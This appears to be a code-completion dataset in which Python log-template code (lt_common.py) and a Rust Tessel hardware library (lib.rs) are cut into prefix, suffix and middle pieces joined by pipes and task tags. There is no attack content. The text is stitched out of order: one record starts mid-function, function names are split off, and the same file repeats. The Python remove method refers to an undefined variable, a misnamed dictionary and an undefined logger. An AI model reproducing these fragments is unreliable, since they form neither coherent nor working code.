print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords): | if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
def remove(self, ltid, ltwords):
node = self._trace(ltwords)
if node is None:
_logger.warning(
"LTSearchTree : Failed to remove ltid {0}".format(ltid))
point.remove_ltid(ltid)
while point.unnecessary():
w = point.word
point = point.parent
if w is None:
point.wild = None
else:
point.wdict.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret | point = self.root
for w in ltwords:
if w == self.sym: | random_line_split |
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import cPickle as pickle
class LTManager(object):
# adding lt to db (ltgen do not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def remove_lt(self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
|
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
def remove(self, ltid, ltwords):
node = self._trace(ltwords)
if node is None:
_logger.warning(
"LTSearchTree : Failed to remove ltid {0}".format(ltid))
point.remove_ltid(ltid)
while point.unnecessary():
w = point.word
point = point.parent
if w is None:
point.wild = None
else:
point.wdict.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret
| return "".join(l_w) | conditional_block |
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import cPickle as pickle
class LTManager(object):
# adding lt to db (ltgen do not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def | (self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
assert not self.ltdict.has_key(ltline.ltid)
self.ltdict[ltline.ltid] = ltline
def remove_lt(self, ltid):
self.ltdict.pop(ltid)
class LogTemplate():
def __init__(self, ltid, ltgid, ltw, lts, count, sym):
self.ltid = ltid
self.ltgid = ltgid
self.ltw = ltw
self.lts = lts
self.cnt = count
self.sym = sym
def __str__(self):
return self.restore_message(self.ltw)
def var(self, l_w):
return [w_org for w_org, w_lt in zip(l_w, self.ltw)
if w_lt == self.sym]
def var_location(self):
return [i for i, w_lt in enumerate(self.ltw) if w_lt == self.sym]
def restore_message(self, l_w):
if self.lts is None:
return "".join(l_w)
else:
return "".join([s + w for w, s in zip(l_w + [""], self.lts)])
def count(self):
self.cnt += 1
return self.cnt
def replace(self, l_w, l_s = None, count = None):
self.ltw = l_w
if l_s is not None:
self.lts = l_s
if count is not None:
self.cnt = count
class LTGroup(object):
# usually used as super class of other ltgroup
# If used directly, this class will work as a dummy
# (ltgid is always same as ltid)
def __init__(self):
self.init_dict()
def init_dict(self):
self.d_group = {} # key : groupid, val : [ltline, ...]
self.d_rgroup = {} # key : ltid, val : groupid
def _next_groupid(self):
cnt = 0
while self.d_group.has_key(cnt):
cnt += 1
else:
return cnt
def add(self, ltline):
gid = ltline.ltid
self.add_ltid(gid, ltline)
return gid
def add_ltid(self, gid, ltline):
self.d_group.setdefault(gid, []).append(ltline)
self.d_rgroup[ltline.ltid] = gid
def restore_ltg(self, db, table):
for ltid, ltgid in db.iter_ltg_def():
self.d_group.setdefault(ltgid, []).append(table[ltid])
self.d_rgroup[ltid] = ltgid
class LTSearchTree():
# Search tree for un-incremental lt generation algorithms
def __init__(self, sym):
self.sym = sym
self.root = self._new_node()
def __str__(self):
l_buf = []
def print_children(point, depth):
word = point.word
if word is None: word = "**"
buf = "-" * depth + " {0}".format(point.word)
if point.end is not None:
buf += " <-- ltid {0}".format(point.end)
l_buf.append(buf)
for word in point.windex.keys():
print_children(point.windex[word], depth + 1)
if point.wild is not None:
print_children(point.wild, depth + 1)
point = self.root
l_buf.append("<head of log template search tree>")
for word in point.windex.keys():
print_children(point.windex[word], 1)
if point.wild is not None:
print_children(point.wild, 1)
return "\n".join(l_buf)
@staticmethod
def _new_node(parent = None, word = None):
return LTSearchTreeNode(parent, word)
def add(self, ltid, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
point.wild = self._new_node(point, w)
point = point.wild
else:
if not point.windex.has_key(w):
point.windex[w] = self._new_node(point, w)
point = point.windex[w]
else:
point.set_ltid(ltid)
def _trace(self, ltwords):
point = self.root
for w in ltwords:
if w == self.sym:
if point.wild is None:
return None
else:
point = point.wild
elif point.windex.has_key(w):
point = point.windex[w]
elif point.wild is not None:
point = point.wild
else:
return None
else:
return point
def remove(self, ltid, ltwords):
node = self._trace(ltwords)
if node is None:
_logger.warning(
"LTSearchTree : Failed to remove ltid {0}".format(ltid))
point.remove_ltid(ltid)
while point.unnecessary():
w = point.word
point = point.parent
if w is None:
point.wild = None
else:
point.wdict.pop(w)
else:
if self.root is None:
self.root = self._new_node()
def search(self, ltwords):
node = self._trace(ltwords)
if node is None:
return None
else:
return node.get_ltid()
class LTSearchTreeNode():
def __init__(self, parent, word):
self.windex = {}
self.wild = None
self.end = None
self.parent = parent # for reverse search to remove
self.word = word
def child(self, word = None):
if word is None:
# wildcard
return self.wild
elif self.windex.has_key(word):
return self.windex[word]
else:
return None
def set_ltid(self, ltid):
self.end = ltid
def remove_ltid(self, ltid):
assert self.end == ltid
self.end = None
def get_ltid(self):
return self.end
def unnecessary(self):
return (len(self.windex) == 0) and \
(self.wild is None) and \
(self.end is None)
def merge_lt(m1, m2, sym):
#return common area of log message (to be log template)
ret = []
for w1, w2 in zip(m1, m2):
if w1 == w2:
ret.append(w1)
else:
ret.append(sym)
return ret
| remove_lt | identifier_name |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ```
pub struct Tessel {
// A group of module ports.
pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value | else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
}
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn toggle(&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
}
| {
sock.write_command(Command::GpioHigh(self.index as u8))
} | conditional_block |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ```
pub struct Tessel {
// A group of module ports.
pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value {
sock.write_command(Command::GpioHigh(self.index as u8))
} else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) |
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
